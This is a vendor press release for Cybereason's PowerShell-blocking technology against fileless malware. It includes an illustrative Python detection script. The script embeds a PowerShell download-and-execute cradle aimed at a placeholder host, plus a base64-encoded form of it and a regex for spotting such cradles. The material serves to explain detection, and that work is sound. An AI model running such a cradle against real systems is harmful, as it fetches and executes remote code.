Fileless malware attacks have gained traction among adversaries in recent years. In fact, one third of organizations faced a fileless malware attack in 2017 according to the SANS 2017 Threat Landscape Survey. Unlike attacks carried out by traditional malware, these malicious operations don’t require the attackers to install a single piece of software on a target’s machine. Instead, fileless malware attacks leverage legitimate applications and IT tools built into Windows, particularly PowerShell, for malicious activity. The malicious use of otherwise legitimate programs makes detecting and preventing these attacks particularly challenging since they are generally trusted by default.
How Cybereason’s PowerShell Blocking Technology Works
Unlike other solutions offered by EDR vendors, Cybereason’s technology looks not only at the raw script or command line, but at every action taken by the code running within the PowerShell engine. This visibility enables behavioral analysis not only at the process level but also deeper, at the PowerShell code level, in order to block malicious scripts before they execute.
The Cybereason solution has unique and powerful capabilities including:
• Addressing all versions of PowerShell, including the most common and least secure version, PowerShell 2.0
• Handling every type of PowerShell invocation, including command line, interactive, script file, and the loading of System.Management.Automation.dll by managed or unmanaged processes
• Coping with obfuscation of any kind
• Notifying analysts about the attack and providing relevant details, such as the users and machines involved
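As an added illustration (not Cybereason's code) of the gap described above between inspecting the process command line and inspecting what the PowerShell engine actually runs, the script below feeds the same download cradle through two invocation vectors and applies one text-level indicator check to each view. The event records, the file path and the URL are constructed placeholders; the engine-content view is modelled on Script Block Logging (event 4104), which PowerShell 2.0 does not emit.

```python
import base64
import re

# Constructed sample: one download-and-execute cradle reaching the engine via
# two entry vectors. The host is a non-resolvable placeholder.
CRADLE = "IEX (New-Object Net.WebClient).DownloadString('http://example.invalid/x')"
ENCODED = base64.b64encode(CRADLE.encode("utf-16-le")).decode("ascii")

EVENTS = [
    # Vector 1: -EncodedCommand. The command line carries only base64 text.
    {"id": 4688, "cmdline": f"powershell.exe -NoP -Enc {ENCODED}"},
    {"id": 4104, "script": CRADLE},
    # Vector 2: script file. The command line carries only a path.
    {"id": 4688, "cmdline": r"powershell.exe -File C:\Users\Public\update.ps1"},
    {"id": 4104, "script": CRADLE},
    # Benign invocation for contrast: both views should agree it is clean.
    {"id": 4688, "cmdline": "powershell.exe -Command Get-Date"},
    {"id": 4104, "script": "Get-Date"},
]

# Text-level indicators of a download-and-execute cradle.
SUSPICIOUS = re.compile(r"DownloadString|Invoke-Expression", re.IGNORECASE)


def cmdline_verdicts(events):
    """Command-line-only view: inspect process-creation (4688) records."""
    return [bool(SUSPICIOUS.search(e["cmdline"])) for e in events if e["id"] == 4688]


def scriptblock_verdicts(events):
    """Engine-content view: inspect the script text the engine compiled (4104)."""
    return [bool(SUSPICIOUS.search(e["script"])) for e in events if e["id"] == 4104]


if __name__ == "__main__":
    print("command line only :", cmdline_verdicts(EVENTS))     # [False, False, False]
    print("script-block level:", scriptblock_verdicts(EVENTS))  # [True, True, False]
```

Script-block text is still text, so string obfuscation can defeat a regex at this level too; the page's claim of inspecting the actions the engine performs goes a step further than this example models.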
The PowerShell protection technology is part of Cybereason’s NGAV offering. Current customers will be upgraded for free.
“Fileless malware attacks can be devastating for security teams and their organizations. Not only can these attacks bypass antivirus and even EDR software, but many traditional approaches to security are rendered useless in the face of these attacks,” said Sam Curry, Chief Security Officer, Cybereason. “While the competition claims to block PowerShell attacks, their exploit blocking is based entirely on command line and will miss a lot of malicious activities and runs the risk of stopping legitimate use indiscriminately. The Cybereason solution is the industry’s only solution for preventing and blocking this escalating attack vector.”
“Enterprises face a real challenge today detecting fileless malware attacks, and with the easy availability of these techniques on the market, they present yet another security challenge for SOCs and security analysts,” said Nick Percoco, Chief Security Officer at Uptake and Cybereason Advisory Board Member. “Cybereason’s solution to detect and prevent malicious PowerShell activities is an important development and a breath of fresh air due to the prevalence of these attacks.”